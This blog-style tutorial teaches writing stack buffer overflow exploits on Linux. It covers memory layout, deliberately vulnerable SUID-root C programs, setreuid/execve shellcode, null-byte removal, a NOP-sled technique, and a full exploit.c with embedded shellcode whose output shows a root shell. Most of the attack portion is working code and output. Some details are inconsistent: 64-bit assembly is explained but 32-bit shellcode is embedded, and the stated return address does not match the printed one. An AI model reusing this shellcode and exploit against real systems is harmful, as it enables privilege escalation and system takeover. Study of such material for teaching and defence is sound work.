In this article, I’m going to walk you through writing exploits that target specific vulnerabilities. Developing exploit code can be tricky, but we’ll break it down into steps to get a working exploit. We’ll start by understanding the different types of vulnerabilities we’re dealing with and how to identify them,

This content is not intended for beginners; it’s aimed at those who already have some understanding of programming and concepts like buffer overflows and memory management. If you’re not quite there yet, I recommend checking out this great series by 0x00pf: Programming Course for Wannabes.

Alright, let’s start with some fundamentals first Memory So the principle of exploiting a buffer overflow is to overwrite parts of memory which aren’t supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, let’s take a look at how memory is organized.

code segment, data in this segment are assembler instructions that the processor executes. The code execution is non-linear, it can skip code, jump, and call functions on certain conditions. Therefore, we have a pointer called EIP, or instruction pointer. The address where EIP points to always contains the code that will be executed next.

data segment , space for variables and dynamic buffers.

stack segment, which is used to pass data (arguments) to functions and as a space for variables of functions. The bottom (start) of the stack usually resides at the very end of the virtual memory of a page, and grows down. The assembler command PUSHL will add to the top of the stack, and POPL will remove one item from the top of the stack and put it in a register. For accessing the stack memory directly, there is the stack pointer ESP that points at the top (lowest memory address) of the stack.

Next, Let’s take a look at an example of a simple function written in assembly, A function is a piece of code in the code segment, that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function.

memory address		code
0x8054321 <main+x>	pushl $0x0
0x8054322		call $0x80543a0 <function>
0x8054327		ret
0x8054328		leave
...
0x80543a0 <function>	popl %eax
0x80543a1		addl $0xf00,%eax
0x80543a4		ret

What’s going on here? The main function calls, The variable is 0, main pushes it onto the stack, and calls the function. The function gets the variable from the stack using popl. After finishing, it returns to 0x80543a0. Commonly, the main function would always push register EBP on the stack, which the function stores, and restores after finishing. This is the frame pointer concept, that allows the function to use own offsets for addressing, which is mostly uninteresting while dealing with exploits.

We just have to know what the stack looks like. At the top, we have the internal buffers and variables of the function. After this, there is the saved EBP register (32 bit, which is 4 bytes), and then the return address, which is again 4 bytes. Further down, there are the arguments passed to the function, which are uninteresting to us. In this case, our return address is 0x8054327. It is automatically stored on the stack when the function is called. This return address can be overwritten, and changed to point to any point in memory, if there is an overflow somewhere in the code.

void foo (void) {
	char small[30];
	gets (small);
	printf("%s\n", small);

}

int main() {
	foo();
	return 0;
}

Alright, so here we’re using gets() to read input into the small buffer. The issue here is that gets() doesn’t perform any bounds checking. This means if a user inputs more than 29 characters, it will overflow the small array and start overwriting adjacent memory. This is a classic example of buffer overflows, so let’s check this out;

(lldb) breakpoint set --name foo
Breakpoint 3: where = overflow`foo + 12 at overflow.c:6:2, address = 0x0000000100003f3c
(lldb) r
Process 25474 exited with status = 9 (0x00000009)
Process 25535 launched: '/overflow' (x86_64)
Process 25535 stopped
* 
    frame #0: 0x0000000100003f3c overflow`foo at overflow.c:6:2
   3
   4   	void foo (void) {
   5   		char small[30];
-> 6   		gets (small);
   7   		printf("%s\n", small);
   8
   9   	}
Target 0: (overflow) stopped.
(lldb) frame variable
(char [30]) small = "`\x80\f"
(lldb) memory read --size 1 --count 40 --format x --force (char*)&small
0x7ff7bfeff620: 0x60 0x80 0x0c 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff628: 0xa0 0x03 0x09 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff630: 0x60 0x3f 0x00 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff638: 0x10 0xc0 0x07 0x00 0x01 0x00 0x00 0x00
0x7ff7bfeff640: 0x60 0xf6 0xef 0xbf 0xf7 0x7f 0x00 0x00
(lldb) continue
Process 25535 resuming
warning: this program uses gets(), which is unsafe.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Process 25535 stopped
* thread #1, queue = '', stop reason = EXC_BAD_ACCESS (code=1, address=0x2a)
    frame #0: 0x0000000100000041 overflow`_mh_execute_header + 65
overflow`_mh_execute_header:
->  0x100000041 <+65>: addb   %al, (%rax)
    0x100000043 <+67>: addb   %al, (%rcx)
    0x100000045 <+69>: addb   %al, (%rax)
    0x100000047 <+71>: addb   %al, (%rax)
Target 0: (overflow) stopped.

We set a breakpoint on the function foo. When we run the program, it hits that breakpoint, and we can see it’s about to call gets(small), which is where the overflow is likely to occur. The contents of the small buffer show some suspicious data immediately after the input is read. This suggests that we’re already pushing the limits of our buffer.

Next, we read more memory beyond the bounds of our small buffer. This allows us to see exactly what’s being overwritten, which can be crucial for understanding the impact of the overflow.

As we push 30 “A” characters into small, the program eventually crashes due to an access violation, attempting to access an invalid memory address. This whole process starkly illustrates the dangers of buffer overflows and the use of unsafe functions like gets().

Always remember: if you’re reading user input, you should check bounds to prevent overflows. Otherwise, you might end up with memory being overwritten, Alright let’s jump,

What do you think is generally more safe: a program dynamically linked to its libraries or one statically linked to them?

Heap vs Stack based overflows

Dynamically allocated variables (those allocated by malloc(); are created on the heap. Unlike the stack, the heap grows upwards on most systems, that is, new variables created on the heap are located at higher memory addresses than older ones. In a simple heap-based buffer overflow attack, an attacker overflows a buffer that is lower on the heap, overwriting other dynamic variables, which can have unexpected and unwanted effects.

Alternatively, the stack starts at a high memory address and forces its way down to a low memory address. The actual placement of replacement on the stack are established by the commands PUSH AND POP, respectively. A value that is Push’ed on to the stack is copied into the memory location and is pointed to as execution occurs by the stack pointer. The stack pointer will then be decremented as the stack sequentially moves down, making room for the next local variables to be added subl $20,%esp. POP is the reverse of such an event.

Stack based are relatively simple in terms of concept, these include functions such as: strcat(), sprint(), strcpy(), gets(), etc…

anywhere where unchecked variables are placed into a buffer of fixed length. Buffer overflows can be avoided by using safe alternatives such as snprintf() with the appropriate size parameter, denoted by ‘n’. showing that the ‘n’ creates the size we want to copy to the buffer, in this instance it’s the complete buffer size, so we don’t go over and create the unwanted overflow, and ultimately execute unwanted arbitrary data.

Let’s start with the vulnerable code, we can make the explanation more clear and easy to follow.

void overflow_function (char *str)
{
  char buffer[20];
  strcpy(buffer, str);  // Function that copies str to buffer
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 128; i++)  // Loop 128 times
  {
    big_string[i] = 'A'; // And fill big_string with 'A's
  }
  overflow_function(big_string);
  exit(0);
}

The function tries to write 128 bytes of data into the 20-byte buffer, the extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As, which is 0x41 in hexadecimal.

The program tries to return to this address, causing the EIP to go to 0x41414141, which is basically just some random address that is either in the wrong memory space or contains invalid instructions, causing the program to crash and die. This is called a stack-based overflow, because the overflow is occurring in the stack memory segment.

when overflow_function() is called the stack frame looks something like this:

  _________          __________________          ___________________________
 |         |        |                  |        |                           |
 | buffer  |------->|return address    |------->| Stack frame pointer (sfp) |
 |         |        |      (ret)       |        |                           |
 |_________|        |__________________|        |___________________________|
    _________________________                                
   |                         |                              
   |  *str (function arg)    | ---> [[[The Rest of the Stack]]]
   |_________________________|                                

The program crashing as a result of a stack-based overflow isn’t really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located,

then the program would “return” to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it’s possible to modify the return address to change the flow of execution by overflowing buffers, all that’s needed is something useful to execute. This is where bytecode injection comes into the picture. Bytecode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers,

The most common piece of bytecode is known as shellcode. This is a piece of bytecode that just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing

The function takes a string as its argument and returns a heap-allocated copy of the string with all uppercase letters converted to lowercase. However, no size control takes place and anything more than 64 chars size causes the issue.

int main(int argc, char *argv[])
{
  char buffer[500];
  strcpy(buffer, argv[1]);
  return 0;
}

The program really does nothing, except mismanage memory. Now to make it truly vulnerable, the ownership must be changed to the root user, and the suid permission bit must be turned on for the compiled binary:

$ sudo chown root f00
$ sudo chmod +s f00
$ ls -l f00
-rwsr-sr-x   1 root   users   4933 Sep 5 15:22 f00

it would work on root’s privileges even if executed by “normal” user. Exploiting
stack buffer overflow vulnerability we can run shell on root’s privileges! How to achieve this? We will write an exploit:

At first we must create special binary code named shellcode, which’s purpose will be to give us root privileges, This means the actual address of the shellcode must be known ahead of time, which can be difficult to know in a dynamically changing stack. To make things even harder, the four bytes where the return address is stored in the stack frame must be overwritten with the value of this address. Even if the correct address is known, but the proper location isn’t overwritten, the program will just crash and die. Two techniques are commonly used to assist with this difficult chicanery.

The first is known as a NOP sled (NOP is short for no operation). This is a single byte instruction that does absolutely nothing. These are sometimes used to waste computational cycles for timing purposes and are actually necessary in the Sparc processor architecture due to instruction pipelining.

In this case, these NOP instructions are going to be used for a different purpose; they’re going to be used as a fudge factor. By creating a large array (or sled) of these NOP instructions and placing it before the shellcode, if the EIP returns to any address found in the NOP sled, the EIP will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP will slide down the sled to the shellcode, which will execute properly.

The second technique is flooding the end of the buffer with many back-to-back instances of the desired return address. This way, as long as any one of these return addresses overwrites the actual return address, the exploit will work as desired.

Here is a representation of a crafted buffer:

  __________       ___________        _________________________
 |          |     |           |      |                         |
 | NOP sled | --->| ShellCode | ---> | Repeated return address |
 |__________|     |___________|      |_________________________|

Even using both of these techniques, the approximate location of the buffer in memory must be known in order to guess the proper return address. One technique for approximating the memory location is to use the current stack pointer as a guide. By subtracting an offset from this stack pointer, the relative address of any variable can be obtained. Because, in this vulnerable program, the first element on the stack is the buffer the shellcode is being put into, the proper return address should be the stack pointer, which means the offset should be close to 0. The NOP sled becomes increasingly useful when exploiting more complicated programs, when the offset isn’t 0.

Shellcode Development

The shellcode must be self-contained and must avoid null bytes, because these will end the string. If the shellcode has a null byte in it, a strcpy() function will recognize that as the end of the string. In order to write a piece of shellcode, an understanding of the assembly language of the target processor is needed. In this case, it’s x86 assembly language.

instruction , The following are some instructions that will be used in the construction of shellcode.

mov     ; Move instruction
        ; Used to set initial values
        mov <dest>, <src>   ; Move the value from <src> into <dest>

add     ; Add instruction
        ; Used to add values
        add <dest>, <src>   ; Add the value in <src> to <dest>

sub     ; Subtract instruction
        ; Used to subtract values
        sub <dest>, <src>   ; Subtract the value in <src> from <dest>

push    ; Push instruction
        ; Used to push values onto the stack
        push <target>       ; Push the value in <target> onto the stack

pop     ; Pop instruction
        ; Used to pop values off the stack
        pop <target>        ; Pop a value from the stack into <target>

Reference: Programming for Wannabees. Part III. Your First Shell Code

Beyond the basic assembly instructions, Linux provides a set of system calls that can be executed directly from assembly. These system calls are accessed using interrupts, and their corresponding numbers are defined in /usr/include/asm-generic/unistd.h.

$ head -n 80 /usr/include/asm-generic/unistd.h

/*
 * This file contains the system call numbers, based on the
 * layout of the x86-64 architecture, which embeds the
 * pointer to the syscall in the table.
 *
 * As a basic principle, no duplication of functionality
 * should be added, e.g. we don't use lseek when llseek
 * is present. New architectures should use this file
 * and implement the less feature-full calls in user space.
 */

#ifndef __SYSCALL
#define __SYSCALL(x, y)
#endif

#if __BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)
#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _32)
#else
#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _64)
#endif

#ifdef __SYSCALL_COMPAT
#define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _comp)
#define __SC_COMP_3264(_nr, _32, _64, _comp) __SYSCALL(_nr, _comp)
#else
#define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _sys)
#define __SC_COMP_3264(_nr, _32, _64, _comp) __SC_3264(_nr, _32, _64)
#endif

...

Using the simple assembly instructions outlined earlier, along with the system calls defined in unistd.h, you can write a variety of assembly programs and bytecode snippets to perform numerous functions. The system call numbers and structures, as specified in /usr/include/asm-generic/unistd.h, are tailored for the x86-64 architecture, allowing efficient interaction with the Linux kernel.

Shell-Spawning

Shell-spawning code is simple code that executes a shell and can be converted into shellcode. The two essential functions required for this process are execve() and setreuid(), corresponding to system call numbers 11 and 70, respectively.

The execve() call is responsible for executing /bin/sh, effectively launching a new shell instance. The setreuid() call is crucial for restoring root privileges, especially in scenarios where they may have been dropped for security reasons. Many SUID root programs will relinquish root privileges whenever possible, and if these privileges aren’t restored in the shellcode, the resulting shell will only have normal user privileges.

There’s no need to include an exit() function call since an interactive shell program is being spawned. While an exit()call wouldn’t cause any issues, it has been omitted from this example to keep the code as compact as possible.

section .text
global _start

_start:
    ; Step 1: Set user ID to root
    xor rax, rax                ; Clear rax register (set to 0)
    mov al, 70                  ; Load syscall number for setreuid (70) into al
    xor rdi, rdi                ; Set effective UID (rdi) to 0 (root)
    xor rsi, rsi                ; Set real UID (rsi) to 0 (root)
    syscall                     ; Trigger the kernel to execute the syscall

    ; Step 2: Spawn a new shell (/bin/sh)
    xor rax, rax                ; Clear rax again (prepare for next syscall)
    push rax                    ; Push null terminator onto the stack for string termination
    mov rdi, 0x68732f2f6e69622f ; Prepare the string "/bin//sh" in rdi
    push rdi                    ; Push the string address onto the stack
    mov rdi, rsp                ; Set rdi to point to the command string in the stack
    push rax                    ; Push null as the first argument (argv[0])
    push rdi                    ; Push the pointer to the command string (argv[1])
    mov rsi, rsp                ; Set rsi to point to the argv array on the stack
    xor rdx, rdx                ; Clear rdx (no environment variables)
    mov al, 59                  ; Load syscall number for execve (59) into al
    syscall                     ; Trigger the kernel to execute the new shell

Here, rax is cleared to ensure it starts with a known state. We then load the syscall number for setreuid into al, which is an 8-bit register, allowing us to specify the syscall with just one byte. The xor rdi, rdi and xor rsi, rsi instructions set both the effective and real user IDs to zero, which corresponds to the root user. Finally, the syscall instruction calls the kernel to apply these changes.

The xor rax, rax clears rax again to reset it before the next syscall. We push a null terminator onto the stack to terminate the string properly. The mov rdi, 0x68732f2f6e69622f instruction sets up the string /bin//sh in rdi. This string is then pushed onto the stack, and rsp (the stack pointer) is used to update rdi, pointing it to the command string.

The next two push instructions are critical: they set up the arguments for the execve syscall. The first push rax puts a null pointer in argv[0], while the second push rdi pushes the pointer to our command string, effectively setting up argv[1]. Finally, mov rsi, rsp points rsi to the array of arguments.

The code wraps up by clearing rdx, indicating that there are no environment variables, before loading the syscall number for execve into al. The final syscall invokes the kernel to run the new shell.

Now let’s try to assemble and link this piece of code to see if it works.

$ nasm -f elf64 shell.asm -o shell.o
$ ld -o shell shell.o

$ ./shell
$ 
$ exit
$ sudo chown root shell
$ sudo chmod +s shell
$ ./shell
#

The program spawns a shell as expected, and if you change the program’s owner to root and set the SUID (Set User ID) permission bit, it’ll give you a root shell. That’s pretty powerful, but now let’s focus on extracting the shellcode.

To pull the raw shellcode from our assembled binary, you can use the following command:

objdump -M intel -d shell | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'

The program successfully spawns a shell, but this code is still far from being proper shellcode. The main issue is that the string is stored in the data segment. This is fine for standalone programs, but shellcode isn’t a traditional executable; it’s a snippet of code meant to be injected into a running program for execution. To function correctly, the string needs to reside alongside the assembly instructions, and we must find a way to reference this string’s address.

The challenge arises because the exact memory location of the executing shellcode isn’t predetermined, so we need to derive the address relative to the EIP (Extended Instruction Pointer). Thankfully, we can utilize the jmp and callinstructions, which support relative addressing to the EIP. This allows us to locate our string in the same memory space as the executing code.

Here’s the breakdown: a call instruction not only moves the EIP to a specified memory location, like a jmp instruction, but it also pushes the return address onto the stack, enabling program execution to resume after the call. If the instruction following the call is a string instead of an instruction, the return address can be popped off the stack and used to reference that string.

The mechanics work like this: at the start of execution, the program jumps to a location at the bottom of the code where a call instruction and the string are defined. When the call executes, the string’s address gets pushed onto the stack. The call then jumps execution back up to a point just below the previous jump instruction, allowing the address of the string to be popped from the stack. Now the program holds a pointer to the string and can carry out its operations, while the string remains neatly tucked away at the end of the code.

jmp two
one:
pop ebx
<program code here>
two:
call one
db 'this is a string'

Here’s how it unfolds: the program jumps down to two, then it calls back up to one, pushing the return address (which is the address of the string) onto the stack. When it pops this address into the EBX register, the program gains access to the string’s address and can execute whatever code it needs.

The stripped-down shellcode employing the call trick to get the address to the string looks something like this:

section .text
global _start

_start:
    jmp short get_string
string_address:
    db 'this is a string'
    
get_string:
    call string_address

The shellcode in shellcode.asm still isn’t ready for action. While it can spawn a shell, it’s not yet usable as proper shellcode due to the presence of null bytes. These null bytes terminate strings in C, so if our shellcode contains any, only the bytes leading up to the first null byte will be executed.

$ hexeditor shellcode
00000110  31 C0 B0 46  31 DB 31 C9   CD 80 31 C0  50 68 2F 2F 1..F1.1...1.Ph//   
00000120  73 68 68 2F  62 69 6E 89   E3 50 53 89  E1 31 D2 B0 shh/bin..PS..1..   
00000130  0B CD 80 00  00 00 00 00   00 00 00 00  00 00 00 00                                                                               ................

The bolded null bytes are problematic, as they signify the end of the shellcode string. For the shellcode to copy correctly into buffers, we need to eliminate these null bytes.

The main culprits for these null bytes are the instructions that move a static value of 0 into registers. To remove these null bytes while retaining functionality, we can find a way to get the value of 0 into a register without explicitly using the number 0. One approach is to load an arbitrary 32-bit value into the register and then subtract that same value:

mov ebx, 0x11223344
sub ebx, 0x11223344

While this method works, it uses two instructions, which bloats the shellcode. Fortunately, there’s a more efficient way: using the XOR instruction.

The XOR instruction performs an exclusive OR operation on the bits of the registers, transforming them as follows:

1 xor 1 = 0
0 xor 0 = 0
1 xor 0 = 1
0 xor 1 = 1

By XORing a register with itself, we can effectively set it to 0 in a single instruction, thereby avoiding null bytes in our shellcode:

xor ebx, ebx  ; Sets ebx to 0 without introducing null bytes

This neat trick allows us to produce functional shellcode while maintaining its compactness, Now that we have a solid understanding of writing shellcode and ensuring its free of null bytes, we can move on to crafting an actual exploit.

Write Your First Exploit

Writing an exploit program can certainly get the job done, but it introduces a barrier between the researcher and the vulnerable application. The compiler handles many aspects of the exploit, which removes a layer of interactivity crucial for exploration and experimentation.

To gain a full understanding of this process, the ability to quickly test different scenarios is vital. With just a few tools specifically, Python’s print command and the command substitution feature in the bash shell, you can effectively exploit a vulnerable program.

$ python3 -c 'print("A"*20)'

This command simply prints the character A 20 times. You can also print non-printable characters using their hexadecimal representation. For example, to print the character A (which has the hexadecimal value of 0x41), you would use:

$ python3 -c 'print("\x41"*20)'

Both commands yield the same output of AAAAAAAAAAAAAAAAAAAA, showcasing how easy it is to manipulate input. This output can then be substituted into a command. For example:

$ python3 -c 'import os; os.system("uname -a")'

Here, we leverage Python to execute uname -a, demonstrating that exploit code can manipulate the stack pointer, create a crafted buffer, and feed it to the vulnerable program. With Python, command substitution, and an approximate return address, we can perform the exploit directly from the command line, Next we can use GDB to find the stack address necessary for our return:

First, set a breakpoint right after the strcpy call:

(gdb) disassemble main
Dump of assembler code
for
function main:
0x0000555555555139 < +0 >: push % rbp
0x000055555555513a < +1 >: mov % rsp, % rbp
0x000055555555513d < +4 >: sub $0x210, % rsp
0x0000555555555144 < +11 >: mov % edi, -0x204( % rbp)
0x000055555555514a < +17 >: mov % rsi, -0x210( % rbp)
0x0000555555555151 < +24 >: mov - 0x210( % rbp), % rax
0x0000555555555158 < +31 >: add $0x8, % rax
0x000055555555515c < +35 >: mov( % rax), % rdx
0x000055555555515f < +38 >: lea - 0x200( % rbp), % rax
0x0000555555555166 < +45 >: mov % rdx, % rsi
0x0000555555555169 < +48 >: mov % rax, % rdi
0x000055555555516c < +51 >: call 0x555555555030 < strcpy @plt >
    0x0000555555555171 < +56 >: mov $0x0, % eax
0x0000555555555176 < +61 >: leave
0x0000555555555177 < +62 >: ret

(gdb) b * 0x555555555030
Breakpoint 1 at 0x555555555030
    (gdb) run `python3 -c 'print("\x90"*200)'`
Breakpoint 1, 0x0000555555555030 in strcpy @plt()
    (gdb) info register

Set a breakpoint at the strcpy address 0x555555555030 At this point, we reach the breakpoint in the strcpy function. and we check the registers to identify the stack address, Next, append shellcode to a NOP sled. Having your shellcode stored in a file makes it easier to manage. By leveraging the hexadecimal bytes we’ve already defined, we can write them directly to a file.

Here’s a look at exploit.c,

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

unsigned long sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[]) {
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    // Define the shellcode
    char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0"
                       "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
                       "\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

    offset = 0;                 
    esp = sp();                 
    ret = esp - offset;          
    
    printf("Stack pointer (ESP) : 0x%x\n", esp);
    printf("    Offset from ESP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%x\n", ret);

    // Allocate 600 bytes for the buffer
    buffer = malloc(600);

    // Fill the entire buffer with the desired return address
    ptr = buffer;
    addr_ptr = (long *)ptr;
    for (i = 0; i < 600; i += 4) {
        *(addr_ptr++) = ret;
    }

    // Fill the first 200 bytes with NOP instructions
    for (i = 0; i < 200; i++) {
        buffer[i] = '\x90';
    }

    // Put the shellcode after the NOP sled
    ptr = buffer + 200;
    for (i = 0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }

    // Null terminate the buffer
    buffer[600 - 1] = 0;

    // Execute the vulnerable program with our crafted buffer
    execl("./f00", "f00", buffer, NULL);
    free(buffer);

    return 0;
}

Finally, compile and execute the exploit,

$ gcc -o exploit exploit.c 
$ ./exploit
Stack pointer (ESP) : 0x650bc0f0
    Offset from ESP : 0x0
Desired Return Addr : 0x650bc0f0
# whoami
root
#

And there you have it! The exploit successfully overwrites the return address on the stack with 0xfccd89b0, which points to our NOP sled and shellcode. Since the vulnerable program has SUID root permissions, executing this shellcode grants us a root shell. This show’s the culmination of our understanding of shellcode writing, stack manipulation, and exploit creation an essential journey for any wannabe hacker.

The Last Opcode

By now, you should be familiar with the concept of stack-based overflows, the construction and execution of shellcode, and the ability to recognize some basic Assembly instructions.

As you go deeper into this field, remember that practice is key. Experiment with different techniques, analyze real-world exploits, and continue building your understanding of low-level programming and system vulnerabilities, That’s all for now, Hope you picked up some knowledge. Until next time,

References